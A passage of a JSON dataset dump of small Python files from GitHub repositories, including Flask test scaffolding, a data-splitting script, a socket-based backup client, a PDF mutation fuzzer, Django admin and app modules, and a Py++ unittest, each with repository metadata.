},"gha_fork":{"kind":"null"},"gha_event_created_at":{"kind":"null"},"gha_created_at":{"kind":"null"},"gha_updated_at":{"kind":"null"},"gha_pushed_at":{"kind":"null"},"gha_size":{"kind":"null"},"gha_stargazers_count":{"kind":"null"},"gha_forks_count":{"kind":"null"},"gha_open_issues_count":{"kind":"null"},"gha_language":{"kind":"null"},"gha_archived":{"kind":"null"},"gha_disabled":{"kind":"null"},"content":{"kind":"string","value":"import pprint\nimport unittest\n\nfrom flask import json\n\nfrom makershop import create_app\nfrom makershop.models import db\nfrom .factories import UserFactory\n\n\nclass MakershopTestCase(unittest.TestCase):\n def setUp(self):\n #db.create_all(app=create_app())\n self.app = create_app()\n self.app.debug = True\n #self.client = self.app.test_client()\n with self.app.test_request_context():\n db.drop_all()\n db.create_all()\n self.client = self.app.test_client()\n\n def tearDown(self):\n with self.app.test_request_context():\n db.drop_all()\n\n def assert_api_error(self, response, status_code, 
message):\n if response.status_code != status_code:\n raise AssertionError(\n \"HTTP Status: {actual} !== {expected}\".format(\n actual=response.status_code,\n expected=status_code,\n )\n )\n\n if json.loads(response.data) != {'message': message}:\n raise AssertionError(\n 'returned JSON:\\n\\nGot: {}\\n\\nExpected: {}'.format(\n response.data.decode('utf-8'),\n json.dumps({'message': message})\n )\n )\n\n\nclass UserLoggedIn(MakershopTestCase):\n def setUp(self):\n super().setUp()\n self.client = self.app.test_client()\n\n with self.app.test_request_context():\n self.user = UserFactory.create(password='foo')\n\n self.client.post(\n '/user/login/',\n data={\n 'username': self.user.email,\n 'password': 'foo',\n }\n )\n"},"src_encoding":{"kind":"string","value":"UTF-8"},"language":{"kind":"string","value":"Python"},"is_vendor":{"kind":"bool","value":false,"string":"false"},"is_generated":{"kind":"bool","value":false,"string":"false"},"year":{"kind":"number","value":2013,"string":"2,013"}}},{"rowIdx":1187,"cells":{"__id__":{"kind":"number","value":4200478039695,"string":"4,200,478,039,695"},"blob_id":{"kind":"string","value":"989550166ca2d2f958d8c32743ab3da089fc5d1f"},"directory_id":{"kind":"string","value":"f4efd48507a830a0c1248393947ce5a74644bf28"},"path":{"kind":"string","value":"/scripts/train_test_split.py"},"content_id":{"kind":"string","value":"4771bd7788aee4613346cbe815966ea5ee66de7a"},"detected_licenses":{"kind":"list 
like","value":[],"string":"[]"},"license_type":{"kind":"string","value":"no_license"},"repo_name":{"kind":"string","value":"pschulam-attic/ulm"},"repo_url":{"kind":"string","value":"https://github.com/pschulam-attic/ulm"},"snapshot_id":{"kind":"string","value":"25bfdfa947be3dfe96a005b224a4bb6862be54de"},"revision_id":{"kind":"string","value":"9f77ab18de2c9a5f18cc7b8daa944e58ed8c1e45"},"branch_name":{"kind":"string","value":"refs/heads/master"},"visit_date":{"kind":"timestamp","value":"2016-09-06T17:19:47.952537","string":"2016-09-06T17:19:47.952537"},"revision_date":{"kind":"timestamp","value":"2013-05-09T17:21:39","string":"2013-05-09T17:21:39"},"committer_date":{"kind":"timestamp","value":"2013-05-09T17:21:39","string":"2013-05-09T17:21:39"},"github_id":{"kind":"null"},"star_events_count":{"kind":"number","value":0,"string":"0"},"fork_events_count":{"kind":"number","value":0,"string":"0"},"gha_license_id":{"kind":"null"},"gha_fork":{"kind":"null"},"gha_event_created_at":{"kind":"null"},"gha_created_at":{"kind":"null"},"gha_updated_at":{"kind":"null"},"gha_pushed_at":{"kind":"null"},"gha_size":{"kind":"null"},"gha_stargazers_count":{"kind":"null"},"gha_forks_count":{"kind":"null"},"gha_open_issues_count":{"kind":"null"},"gha_language":{"kind":"null"},"gha_archived":{"kind":"null"},"gha_disabled":{"kind":"null"},"content":{"kind":"string","value":"import argparse\nimport random\nimport sys\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-p', help='Percentage of data for training', type=float)\n parser.add_argument('--train', help='Write the training data to this file', default='train.txt')\n parser.add_argument('--test', help='Write the test data to this file', default='test.txt')\n parser.add_argument('--seed', help='Random seed (a string)', default='split')\n args = parser.parse_args()\n\n data = [l.strip() for l in sys.stdin if l.strip()]\n random.seed(args.seed)\n train_set = set(random.sample(xrange(len(data)), int(args.p * 
len(data))))\n\n with open(args.train, 'w') as train, open(args.test, 'w') as test:\n for i, d in enumerate(data):\n stream = train if i in train_set else test\n stream.write(d + '\\n')\n\n\nif __name__ == '__main__':\n main()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"},"src_encoding":{"kind":"string","value":"UTF-8"},"language":{"kind":"string","value":"Python"},"is_vendor":{"kind":"bool","value":false,"string":"false"},"is_generated":{"kind":"bool","value":false,"string":"false"},"year":{"kind":"number","value":2013,"string":"2,013"}}},{"rowIdx":1188,"cells":{"__id__":{"kind":"number","value":12292196416134,"string":"12,292,196,416,134"},"blob_id":{"kind":"string","value":"f622e338359c699204218cd6a1ac9f5e330bed8c"},"directory_id":{"kind":"string","value":"5f3dccbac5179b500054add89744220591ce838f"},"path":{"kind":"string","value":"/client.py"},"content_id":{"kind":"string","value":"3b0bd8e2968bc86f97b664900e4a1ee3e70844fa"},"detected_licenses":{"kind":"list like","value":[],"string":"[]"},"license_type":{"kind":"string","value":"no_license"},"repo_name":{"kind":"string","value":"f-prime/IonicBackup"},"repo_url":{"kind":"string","value":"https://github.com/f-prime/IonicBackup"},"snapshot_id":{"kind":"string","value":"23cb1e49c45799a5a5c86a4216817f5dca1f51e5"},"revision_id":{"kind":"string","value":"17b467bfcfe41b959c1c0ace3d3d4627531ae2f4"},"branch_name":{"kind":"string","value":"refs/heads/master"},"visit_date":{"kind":"timestamp","value":"2021-05-27T16:28:35.642015","string":"2021-05-27T16:28:35.642015"},"revision_date":{"kind":"timestamp","value":"2013-04-05T00:40:13","string":"2013-04-05T00:40:13"},"committer_date":{"kind":"timestamp","value":"2013-04-05T00:40:13","string":"2013-04-05T00:40:13"},"github_id":{"kind":"number","value":8789289,"string":"8,789,289"},"star_events_count":{"kind":"number","value":4,"string":"4"},"fork_events_count":{"kind":"number","value":0,"string":"0"},"gha_license_id":{"kind":"null"},"gha_fork":{"kind":"null"},"gha_event_created_at":{"kin
d":"null"},"gha_created_at":{"kind":"null"},"gha_updated_at":{"kind":"null"},"gha_pushed_at":{"kind":"null"},"gha_size":{"kind":"null"},"gha_stargazers_count":{"kind":"null"},"gha_forks_count":{"kind":"null"},"gha_open_issues_count":{"kind":"null"},"gha_language":{"kind":"null"},"gha_archived":{"kind":"null"},"gha_disabled":{"kind":"null"},"content":{"kind":"string","value":"import socket, os, time, sys, thread, getpass, hashlib\n\nclass IonicClient:\n def __init__(self, ip, port, username, password):\n self.ip = ip\n self.port = port\n self.username = hashlib.sha256(username).hexdigest()\n self.password = hashlib.sha256(password).hexdigest()\n self.dirs = []\n self.files = {}\n for x,y,z in os.walk(os.getcwd()):\n for b in z:\n if b == sys.argv[0]:\n continue\n with open(x+\"/\"+b, 'rb') as file:\n self.files[b.strip(\"/\")] = hash(file.read())\n def main(self):\n while True:\n try:\n time.sleep(1)\n stuff = self.list().split(\":\")\n try:\n dir = eval(stuff[0])\n except SyntaxError:\n print \"\\nLogin Failed\"\n break\n file = eval(stuff[1])\n for x in dir:\n if not os.path.exists(x.strip(\"/\")):\n os.mkdir(x.strip(\"/\"))\n self.dirs.append(x)\n for x in file:\n if not os.path.exists(x) and x not in self.files:\n self.get(x)\n with open(x, 'rb') as f:\n self.files[x] = hash(f.read())\n if not os.path.exists(x) and x in self.files:\n self.delete(x)\n del self.files[x]\n for x,y,z in os.walk(os.getcwd()):\n for d in y:\n direc = x.strip(os.getcwd())+\"/\"+d\n direc = direc.strip(\"/\")\n if direc not in self.dirs:\n self.dirs.append(direc)\n if direc not in dir:\n self.senddir(direc)\n for f in z:\n file_c = x +\"/\"+ f\n file_c = file_c.replace(os.getcwd(), '').strip(\"/\")\n if file_c == sys.argv[0]:\n continue\n if file_c in self.files and file_c not in file:\n self.send(file_c)\n elif file_c not in self.files and file_c not in file:\n with open(file_c, 'rb') as f:\n self.files[file_c] = hash(f.read())\n self.send(file_c)\n elif file_c in self.files and file_c 
in file:\n with open(file_c, 'rb') as f:\n if hash(f.read()) != self.files[file_c]:\n self.send(file_c)\n with open(file_c, 'rb') as f:\n self.files[file_c] = hash(f.read())\n except Exception, error:\n print error\n print \"\\n Could not connect to server, trying again.\"\n time.sleep(1)\n def senddir(self, direc):\n senddir = socket.socket()\n try:\n senddir.connect((self.ip, self.port))\n except:\n print \"Could not connect to server.\"\n send = \"senddir {0} {1} {2}\".format(direc, self.username, self.password)\n senddir.send(send)\n senddir.close()\n def list(self):\n list = socket.socket()\n try:\n list.connect((self.ip, self.port))\n except:\n print \"Could not connect to server.\"\n send = \"list {0} {1}\".format(self.username, self.password)\n list.send(send)\n data = ''\n while True:\n d = list.recv(1024)\n data = data + d\n if not d:\n break\n return data\n list.close()\n def send(self, file):\n print \"sending\", file\n send = socket.socket()\n send.connect((self.ip, self.port))\n sends = \"send {0} {1} {2}\\r\\n\\r\\n\".format(file, self.username, self.password)\n send.send(sends)\n with open(file, 'rb') as file_:\n for x in file_.readlines():\n send.send(x)\n print \"Done sending\", file\n send.close()\n def get(self, file):\n print \"Downloading\", file\n get = socket.socket()\n try:\n get.connect((self.ip, self.port))\n except:\n print \"Could not connect to server\"\n send = \"get {0} {1} {2}\".format(file, self.username, self.password)\n get.send(send)\n with open(file, 'wb') as name:\n while True:\n data = get.recv(1024)\n if not data:\n print \"Done downloading\", file\n get.close()\n break\n name.write(data)\n def delete(self, file):\n if file == sys.argv[0]:\n print \"You can not delete Ionic Backup Client\"\n else:\n try:\n os.remove(file)\n except:\n print \"File doesn't exist\"\n\n delete = socket.socket()\n try:\n delete.connect((self.ip, self.port))\n except:\n print \"Could not connect to server.\"\n send = \"del {0} {1} 
{2}\".format(file, self.username, self.password)\n delete.send(send)\n delete.close()\n def delete_dir(self, file):\n try:\n os.rmdir(file)\n except:\n print \"Directory doesn't exist\"\n deldir = socket.socket()\n try:\n deldir.connect((self.ip, self.port))\n except:\n print \"Could not connect to server.\"\n \n send = \"deldir {0} {1} {2}\".format(file, self.username, self.password)\n deldir.send(send)\n deldir.close()\n\ndef shell(ip, port, username, password):\n while True:\n cmd = raw_input(\"IonicShell> \")\n if cmd == \"help\":\n print \"\"\"\n\n rm - Deletes a file on the server and locally.\n rmdir - Deletes a directory on the server and locally.\n ls - Returns all the files on the server.\n\n \"\"\"\n elif cmd.startswith(\"rm \"):\n cmd = cmd.split()[1]\n IonicClient(ip, port, username, password).delete(cmd)\n\n elif cmd.startswith(\"rmdir \"):\n cmd = cmd.split()[1]\n IonicClient(ip, port, username, password).delete_dir(cmd)\n elif cmd == \"ls\":\n stuff = IonicClient(ip, port, username, password).list().split(\":\")\n print \"Directories: \\n\"+'\\n'.join(eval(stuff[0]))\n print \"\\n\"\n print \"Files: \\n\"+'\\n'.join(eval(stuff[1]))\n\nif __name__ == \"__main__\":\n try:\n ip = sys.argv[1]\n port = int(sys.argv[2])\n except IndexError:\n print \"Usage: python client.py \"\n else:\n username = raw_input(\"Username: \")\n password = getpass.getpass(\"Password: \")\n thread.start_new_thread(shell, (ip, port, username, password))\n IonicClient(ip, port, username, 
password).main()\n"},"src_encoding":{"kind":"string","value":"UTF-8"},"language":{"kind":"string","value":"Python"},"is_vendor":{"kind":"bool","value":false,"string":"false"},"is_generated":{"kind":"bool","value":false,"string":"false"},"year":{"kind":"number","value":2013,"string":"2,013"}}},{"rowIdx":1189,"cells":{"__id__":{"kind":"number","value":18528488934689,"string":"18,528,488,934,689"},"blob_id":{"kind":"string","value":"7a6929f42659f7250da041793911e80342ef94a9"},"directory_id":{"kind":"string","value":"975e70f89e54e91adc00f1028183011f6a9a37fd"},"path":{"kind":"string","value":"/Software Debugging/fuzzing.py"},"content_id":{"kind":"string","value":"5bae71e90f61335351740d89f3d47776f1bd18e9"},"detected_licenses":{"kind":"list like","value":[],"string":"[]"},"license_type":{"kind":"string","value":"no_license"},"repo_name":{"kind":"string","value":"marceldallagnol/short-programs"},"repo_url":{"kind":"string","value":"https://github.com/marceldallagnol/short-programs"},"snapshot_id":{"kind":"string","value":"953ca21a71a0a1ada6c85e05ad416c8049983a28"},"revision_id":{"kind":"string","value":"9a5fd1f1f92d4789e43c81b8953cb9770a08e1b5"},"branch_name":{"kind":"string","value":"refs/heads/master"},"visit_date":{"kind":"timestamp","value":"2021-05-27T23:03:32.965876","string":"2021-05-27T23:03:32.965876"},"revision_date":{"kind":"timestamp","value":"2012-09-15T23:42:28","string":"2012-09-15T23:42:28"},"committer_date":{"kind":"timestamp","value":"2012-09-15T23:42:28","string":"2012-09-15T23:42:28"},"github_id":{"kind":"null"},"star_events_count":{"kind":"number","value":0,"string":"0"},"fork_events_count":{"kind":"number","value":0,"string":"0"},"gha_license_id":{"kind":"null"},"gha_fork":{"kind":"null"},"gha_event_created_at":{"kind":"null"},"gha_created_at":{"kind":"null"},"gha_updated_at":{"kind":"null"},"gha_pushed_at":{"kind":"null"},"gha_size":{"kind":"null"},"gha_stargazers_count":{"kind":"null"},"gha_forks_count":{"kind":"null"},"gha_open_issues_count":{"kind":
"null"},"gha_language":{"kind":"null"},"gha_archived":{"kind":"null"},"gha_disabled":{"kind":"null"},"content":{"kind":"string","value":"from subprocess import call\nfrom datetime import datetime\nfrom random import randrange\nfrom shutil import copy\n\nfor i in range(100000):\n test = list(open('front_base.pdf','rb').read())\n test[randrange(len(test))] = '%c' % randrange(256)\n test = ''.join(test)\n front = open('front.pdf', 'w')\n front.write(test)\n front.close()\n call('pdftk front.pdf background back.pdf output out.pdf'.split())\n copy('front.pdf', str(i) + '_' + str(datetime.now()))\n print i\n"},"src_encoding":{"kind":"string","value":"UTF-8"},"language":{"kind":"string","value":"Python"},"is_vendor":{"kind":"bool","value":false,"string":"false"},"is_generated":{"kind":"bool","value":false,"string":"false"},"year":{"kind":"number","value":2012,"string":"2,012"}}},{"rowIdx":1190,"cells":{"__id__":{"kind":"number","value":18897856114293,"string":"18,897,856,114,293"},"blob_id":{"kind":"string","value":"c0cd10b877e2bca6ebb83dd21e6541375a29c55e"},"directory_id":{"kind":"string","value":"64369aee9ec21d0bcc59afb345069ad7168dada4"},"path":{"kind":"string","value":"/model/book.py"},"content_id":{"kind":"string","value":"ac2f9664688be6dd2a800f9883c0ec84610dd5fd"},"detected_licenses":{"kind":"list 
like","value":[],"string":"[]"},"license_type":{"kind":"string","value":"no_license"},"repo_name":{"kind":"string","value":"nair13/Molurus"},"repo_url":{"kind":"string","value":"https://github.com/nair13/Molurus"},"snapshot_id":{"kind":"string","value":"ab313f02dc21d68e98c0014ce5cc4c4a11981fed"},"revision_id":{"kind":"string","value":"5c71151b0e435f0caa34faacaf2e18c98e5ab831"},"branch_name":{"kind":"string","value":"refs/heads/master"},"visit_date":{"kind":"timestamp","value":"2016-09-10T20:24:48.633580","string":"2016-09-10T20:24:48.633580"},"revision_date":{"kind":"timestamp","value":"2014-07-02T14:57:21","string":"2014-07-02T14:57:21"},"committer_date":{"kind":"timestamp","value":"2014-07-02T14:57:21","string":"2014-07-02T14:57:21"},"github_id":{"kind":"null"},"star_events_count":{"kind":"number","value":0,"string":"0"},"fork_events_count":{"kind":"number","value":0,"string":"0"},"gha_license_id":{"kind":"null"},"gha_fork":{"kind":"null"},"gha_event_created_at":{"kind":"null"},"gha_created_at":{"kind":"null"},"gha_updated_at":{"kind":"null"},"gha_pushed_at":{"kind":"null"},"gha_size":{"kind":"null"},"gha_stargazers_count":{"kind":"null"},"gha_forks_count":{"kind":"null"},"gha_open_issues_count":{"kind":"null"},"gha_language":{"kind":"null"},"gha_archived":{"kind":"null"},"gha_disabled":{"kind":"null"},"content":{"kind":"string","value":"# -*- coding: utf-8 -*-\nimport fileops as op\n\ndef list_books(db,conf):\n book = \"%s_book\"%conf.db_pre\n books = db.select(book)\n return books\n\ndef add_book(db,conf,i):\n book = \"%s_book\"%conf.db_pre\n db.insert(book, book_title = i.book_title,\n book_author = i.book_author,\n book_category = i.book_category,\n book_count = i.book_count)\n\ndef issue_book(db,conf,i):\n transact = \"%s_transact\"%conf.db_pre\n cur = op.curr_date()\n db.insert(transact, book_id = id(i.book_id),\n user_id = i.user_id,\n issue_date = cur,\n return_date = cur,\n due_date = 
i.due_date)"},"src_encoding":{"kind":"string","value":"UTF-8"},"language":{"kind":"string","value":"Python"},"is_vendor":{"kind":"bool","value":false,"string":"false"},"is_generated":{"kind":"bool","value":false,"string":"false"},"year":{"kind":"number","value":2014,"string":"2,014"}}},{"rowIdx":1191,"cells":{"__id__":{"kind":"number","value":4629974758612,"string":"4,629,974,758,612"},"blob_id":{"kind":"string","value":"46ec9067d736d46b27c6db1398f5ff3238a42fc6"},"directory_id":{"kind":"string","value":"6bf31679387a3cbd40cde69aa63dd685a9f03662"},"path":{"kind":"string","value":"/dirt/django.py"},"content_id":{"kind":"string","value":"db5f742c93a2eb5760a118a5e7e5b34db25789b3"},"detected_licenses":{"kind":"list like","value":["BSD-2-Clause"],"string":"[\n \"BSD-2-Clause\"\n]"},"license_type":{"kind":"string","value":"permissive"},"repo_name":{"kind":"string","value":"joelcrocker/dirt"},"repo_url":{"kind":"string","value":"https://github.com/joelcrocker/dirt"},"snapshot_id":{"kind":"string","value":"bc7d409b2f88c4f57dee9f498e0d2b2c29a0cddc"},"revision_id":{"kind":"string","value":"70150add2b58f5040e242ad97d052910b6a66646"},"branch_name":{"kind":"string","value":"refs/heads/master"},"visit_date":{"kind":"timestamp","value":"2021-01-16T21:01:57.283605","string":"2021-01-16T21:01:57.283605"},"revision_date":{"kind":"timestamp","value":"2013-02-05T00:38:04","string":"2013-02-05T00:38:04"},"committer_date":{"kind":"timestamp","value":"2013-02-05T00:38:04","string":"2013-02-05T00:38:04"},"github_id":{"kind":"null"},"star_events_count":{"kind":"number","value":0,"string":"0"},"fork_events_count":{"kind":"number","value":0,"string":"0"},"gha_license_id":{"kind":"null"},"gha_fork":{"kind":"null"},"gha_event_created_at":{"kind":"null"},"gha_created_at":{"kind":"null"},"gha_updated_at":{"kind":"null"},"gha_pushed_at":{"kind":"null"},"gha_size":{"kind":"null"},"gha_stargazers_count":{"kind":"null"},"gha_forks_count":{"kind":"null"},"gha_open_issues_count":{"kind":"null"},"gha_lang
uage":{"kind":"null"},"gha_archived":{"kind":"null"},"gha_disabled":{"kind":"null"},"content":{"kind":"string","value":"from __future__ import absolute_import\n\nimport logging\n\nfrom django.core.handlers.wsgi import WSGIHandler as DjangoWSGIApp\nfrom django.conf import settings\nfrom gevent.wsgi import WSGIServer\nimport gevent\n\nfrom .app import DirtApp\n\n\nclass DjangoApp(DirtApp):\n log = logging.getLogger(__name__)\n\n def setup(self):\n self.application = DjangoWSGIApp()\n if self.settings.DEBUG:\n from werkzeug import DebuggedApplication\n self.application = DebuggedApplication(self.application, evalex=True)\n settings.get_api = self.settings.get_api\n self.server = WSGIServer(self.settings.http_bind, self.application, log=None)\n\n def serve_dirt_rpc(self):\n \"\"\" Calls ``DirtApp.serve`` to start the RPC server, which lets callers\n use the debug API. \"\"\"\n if getattr(self.settings, \"bind_url\", None) is None:\n self.log.info(\"no `bind_url` specified; RPC server not starting.\")\n return\n DirtApp.serve(self)\n\n def serve(self):\n self.api_thread = gevent.spawn(self.serve_dirt_rpc)\n self.log.info(\"Starting server on http://%s:%s...\", *self.settings.http_bind)\n self.server.serve_forever()\n\n def get_api(self, *args, **kwargs):\n \"\"\" The DjangoApp returns an empty API object by default so that tab\n completion of the API will work. 
Feel free to override this method.\n \"\"\"\n return object()\n"},"src_encoding":{"kind":"string","value":"UTF-8"},"language":{"kind":"string","value":"Python"},"is_vendor":{"kind":"bool","value":false,"string":"false"},"is_generated":{"kind":"bool","value":false,"string":"false"},"year":{"kind":"number","value":2013,"string":"2,013"}}},{"rowIdx":1192,"cells":{"__id__":{"kind":"number","value":10660108851044,"string":"10,660,108,851,044"},"blob_id":{"kind":"string","value":"1e14f9b23cf4016cc3ef224f114a60ac918cf69c"},"directory_id":{"kind":"string","value":"98096fce6b6e05d10b3fc3c979afafe8d6aa54f5"},"path":{"kind":"string","value":"/cerberos/admin.py"},"content_id":{"kind":"string","value":"f6e427d21273e0dbc236037a41768914d084deef"},"detected_licenses":{"kind":"list like","value":["BSD-3-Clause"],"string":"[\n \"BSD-3-Clause\"\n]"},"license_type":{"kind":"string","value":"permissive"},"repo_name":{"kind":"string","value":"AdrianRibao/cerberos"},"repo_url":{"kind":"string","value":"https://github.com/AdrianRibao/cerberos"},"snapshot_id":{"kind":"string","value":"eec4b15f897fbc349dd22db1ca404a089dc35426"},"revision_id":{"kind":"string","value":"25c1878ca14a1d1ac90315029e74c6e2f9cf8bd6"},"branch_name":{"kind":"string","value":"refs/heads/master"},"visit_date":{"kind":"timestamp","value":"2021-01-25T08:42:43.147364","string":"2021-01-25T08:42:43.147364"},"revision_date":{"kind":"timestamp","value":"2014-06-04T12:20:49","string":"2014-06-04T12:20:49"},"committer_date":{"kind":"timestamp","value":"2014-06-04T12:21:24","string":"2014-06-04T12:21:24"},"github_id":{"kind":"number","value":6059635,"string":"6,059,635"},"star_events_count":{"kind":"number","value":1,"string":"1"},"fork_events_count":{"kind":"number","value":1,"string":"1"},"gha_license_id":{"kind":"null"},"gha_fork":{"kind":"bool","value":false,"string":"false"},"gha_event_created_at":{"kind":"timestamp","value":"2013-01-11T10:27:50","string":"2013-01-11T10:27:50"},"gha_created_at":{"kind":"timestamp","value":"
2012-10-03T12:20:41","string":"2012-10-03T12:20:41"},"gha_updated_at":{"kind":"timestamp","value":"2013-01-10T12:30:04","string":"2013-01-10T12:30:04"},"gha_pushed_at":{"kind":"timestamp","value":"2013-01-10T12:30:03","string":"2013-01-10T12:30:03"},"gha_size":{"kind":"number","value":160,"string":"160"},"gha_stargazers_count":{"kind":"null"},"gha_forks_count":{"kind":"number","value":1,"string":"1"},"gha_open_issues_count":{"kind":"number","value":2,"string":"2"},"gha_language":{"kind":"string","value":"Python"},"gha_archived":{"kind":"null"},"gha_disabled":{"kind":"null"},"content":{"kind":"string","value":"# -*- coding: utf-8 -*-\nfrom django.contrib import admin\nfrom cerberos.models import FailedAccessAttempt\nfrom django.utils.translation import ugettext as _ \n\nclass FailedAccessAttemptAdmin(admin.ModelAdmin):\n date_hierarchy = 'created'\n list_display = [\n 'ip_address',\n 'username',\n 'locked',\n 'expired',\n 'user_agent',\n 'failed_logins',\n 'get_time_to_forget_text',\n 'site',\n ]\n list_filter = [\n 'locked',\n 'expired',\n 'site',\n ]\n search_fields = [\n 'ip_address',\n 'username',\n 'user_agent',\n ]\n fieldsets = (\n ('Main data', {\n 'fields': ('site', 'ip_address', 'username', 'locked', 'expired', 'failed_logins', )\n }),\n ('Data recollected', {\n #'classes': ('collapse',),\n 'fields': ('user_agent', 'get_data', 'post_data', 'http_accept', 'path_info',)\n }),\n )\n actions = ['lock', 'unlock']\n\n def lock(self, request, queryset):\n queryset.update(locked=True)\n lock.short_description = _(u'Lock the users')\n\n def unlock(self, request, queryset):\n queryset.update(locked=False)\n unlock.short_description = _(u'Unlock the users')\n\nadmin.site.register(FailedAccessAttempt, 
FailedAccessAttemptAdmin)\n"},"src_encoding":{"kind":"string","value":"UTF-8"},"language":{"kind":"string","value":"Python"},"is_vendor":{"kind":"bool","value":false,"string":"false"},"is_generated":{"kind":"bool","value":false,"string":"false"},"year":{"kind":"number","value":2014,"string":"2,014"}}},{"rowIdx":1193,"cells":{"__id__":{"kind":"number","value":14336600864901,"string":"14,336,600,864,901"},"blob_id":{"kind":"string","value":"8f988c53d4bdb3a51de19673f5a74305d4df3c15"},"directory_id":{"kind":"string","value":"d115cf7a1b374d857f6b094d4b4ccd8e9b1ac189"},"path":{"kind":"string","value":"/tags/pyplusplus_dev_1.0.0/unittests/transfer_ownership_old_tester.py"},"content_id":{"kind":"string","value":"7883a27035a915920e279dfbf359e28931357e53"},"detected_licenses":{"kind":"list like","value":["BSL-1.0"],"string":"[\n \"BSL-1.0\"\n]"},"license_type":{"kind":"string","value":"permissive"},"repo_name":{"kind":"string","value":"gatoatigrado/pyplusplusclone"},"repo_url":{"kind":"string","value":"https://github.com/gatoatigrado/pyplusplusclone"},"snapshot_id":{"kind":"string","value":"30af9065fb6ac3dcce527c79ed5151aade6a742f"},"revision_id":{"kind":"string","value":"a64dc9aeeb718b2f30bd6a5ff8dcd8bfb1cd2ede"},"branch_name":{"kind":"string","value":"refs/heads/master"},"visit_date":{"kind":"timestamp","value":"2016-09-05T23:32:08.595261","string":"2016-09-05T23:32:08.595261"},"revision_date":{"kind":"timestamp","value":"2010-05-16T10:53:45","string":"2010-05-16T10:53:45"},"committer_date":{"kind":"timestamp","value":"2010-05-16T10:53:45","string":"2010-05-16T10:53:45"},"github_id":{"kind":"number","value":700369,"string":"700,369"},"star_events_count":{"kind":"number","value":4,"string":"4"},"fork_events_count":{"kind":"number","value":2,"string":"2"},"gha_license_id":{"kind":"null"},"gha_fork":{"kind":"null"},"gha_event_created_at":{"kind":"null"},"gha_created_at":{"kind":"null"},"gha_updated_at":{"kind":"null"},"gha_pushed_at":{"kind":"null"},"gha_size":{"kind":"null"},
"gha_stargazers_count":{"kind":"null"},"gha_forks_count":{"kind":"null"},"gha_open_issues_count":{"kind":"null"},"gha_language":{"kind":"null"},"gha_archived":{"kind":"null"},"gha_disabled":{"kind":"null"},"content":{"kind":"string","value":"# Copyright 2004-2008 Roman Yakovenko.\r\n# Distributed under the Boost Software License, Version 1.0. (See\r\n# accompanying file LICENSE_1_0.txt or copy at\r\n# http://www.boost.org/LICENSE_1_0.txt)\r\n\r\nimport os\r\nimport sys\r\nimport unittest\r\nimport fundamental_tester_base\r\nfrom pyplusplus import code_creators\r\nfrom pyplusplus.module_builder import call_policies\r\nfrom pyplusplus import function_transformers as ft\r\n\r\n\r\nimpl_conv_code = \\\r\n\"\"\"\r\nboost::python::implicitly_convertible< std::auto_ptr< %(from)s >, std::auto_ptr< %(to)s > >();\r\n\"\"\"\r\n\r\nregister_sptr = \\\r\n\"\"\"\r\nboost::python::register_ptr_to_python< %s >();\r\n\"\"\"\r\n\r\nclass tester_t(fundamental_tester_base.fundamental_tester_base_t):\r\n EXTENSION_NAME = 'transfer_ownership_old'\r\n \r\n def __init__( self, *args ):\r\n fundamental_tester_base.fundamental_tester_base_t.__init__( \r\n self\r\n , tester_t.EXTENSION_NAME\r\n , *args )\r\n\r\n def customize( self, mb ):\r\n event_clss = mb.classes( lambda cls: cls.name in ( 'event_t', 'do_nothing_t' ) )\r\n for cls in event_clss:\r\n cls.exposed_class_type = cls.EXPOSED_CLASS_TYPE.WRAPPER \r\n cls.held_type = 'std::auto_ptr< %s >' % cls.wrapper_alias\r\n cls.add_registration_code( register_sptr % 'std::auto_ptr< %s >' % cls.decl_string, False )\r\n cls.add_registration_code( impl_conv_code % { 'from' : cls.wrapper_alias\r\n , 'to' : cls.decl_string }\r\n , False)\r\n for base in cls.recursive_bases:\r\n if base.access_type == 'public':\r\n cls.add_registration_code( #from class to its base\r\n impl_conv_code % { 'from' : cls.decl_string\r\n , 'to' : base.related_class.decl_string }\r\n , False)\r\n \r\n cls.add_registration_code( #from wrapper to clas base class\r\n 
impl_conv_code % { 'from' : cls.wrapper_alias\r\n , 'to' : base.related_class.decl_string }\r\n , False)\r\n\r\n simulator = mb.class_( 'simulator_t' )\r\n simulator.mem_fun( 'get_event' ).call_policies \\\r\n = call_policies.return_internal_reference()\r\n schedule = mb.mem_fun( 'schedule' )\r\n schedule.add_transformation( ft.transfer_ownership(0), alias='schedule' )\r\n \r\n def run_tests( self, module):\r\n class py_event_t( module.event_t ):\r\n def __init__( self, container ):\r\n module.event_t.__init__( self )\r\n self.container = container\r\n \r\n def notify( self ):\r\n print 'notify'\r\n self.container.append( 1 )\r\n print '1 was append'\r\n \r\n print 'test started'\r\n notify_data = []\r\n simulator = module.simulator_t()\r\n print 'simulator created'\r\n event = py_event_t( notify_data )\r\n print 'py_event_t created: ', id( event )\r\n simulator.schedule( event ) \r\n print 'event was shceduled'\r\n print 'event refcount: ', sys.getrefcount( event )\r\n print 'simulator refcount: ', sys.getrefcount( simulator )\r\n #~ del event\r\n print 'event was deleted'\r\n event = simulator.get_event()\r\n print 'event was restored via saved reference in simulator: ', id( event )\r\n print 'event refcount: ', sys.getrefcount( simulator.get_event() )\r\n print 'call event.notify(): ', simulator.get_event().notify()\r\n print 'call simulator.run()'\r\n simulator.run()\r\n self.failUnless( notify_data[0] == 1 )\r\n \r\ndef create_suite():\r\n suite = unittest.TestSuite() \r\n suite.addTest( unittest.makeSuite(tester_t))\r\n return suite\r\n\r\ndef run_suite():\r\n unittest.TextTestRunner(verbosity=2).run( create_suite() )\r\n\r\nif __name__ == \"__main__\":\r\n 
run_suite()\r\n"},"src_encoding":{"kind":"string","value":"UTF-8"},"language":{"kind":"string","value":"Python"},"is_vendor":{"kind":"bool","value":false,"string":"false"},"is_generated":{"kind":"bool","value":false,"string":"false"},"year":{"kind":"number","value":2010,"string":"2,010"}}},{"rowIdx":1194,"cells":{"__id__":{"kind":"number","value":15350213132505,"string":"15,350,213,132,505"},"blob_id":{"kind":"string","value":"bd3f846a51bf1c46eaec913cd7ebc30ca017236a"},"directory_id":{"kind":"string","value":"66fcdc7a97ad8979c8fddddf8a7d5ce0727bc486"},"path":{"kind":"string","value":"/src/test.py"},"content_id":{"kind":"string","value":"72bb5b157e814a3f3f6edaaa238ec4342b54c030"},"detected_licenses":{"kind":"list like","value":["MIT"],"string":"[\n 